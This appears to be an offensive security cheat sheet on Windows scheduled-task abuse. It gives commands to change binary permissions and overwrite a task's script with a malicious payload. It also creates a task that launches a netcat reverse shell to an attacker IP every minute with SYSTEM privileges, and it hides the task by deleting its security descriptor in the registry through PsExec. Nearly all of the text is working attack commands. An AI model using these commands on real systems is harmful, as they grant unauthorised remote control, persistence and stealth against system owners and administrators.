Use the built-in schtasks command to create and manipulate Windows tasks (basically the equivalent of *NIX cron jobs).
# List scheduled tasks
#
schtasks
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
# Force a task to run (iff the current user has permission to
# do so)
#
schtasks /run /tn $TASK_NAMEIf a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.
It may also be possible to create your own tasks.
# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
/ru SYSTEM
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAMEStealthy tasks
How to hide Windows tasks using PsExec
Deleting the task Security Descriptor will make the task invisible to any user in the system. Note that this requires PsExec!
Link to original
Use
PsExec64.exe -s -i regeditto open regedit with SYSTEM privileges.Search in
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.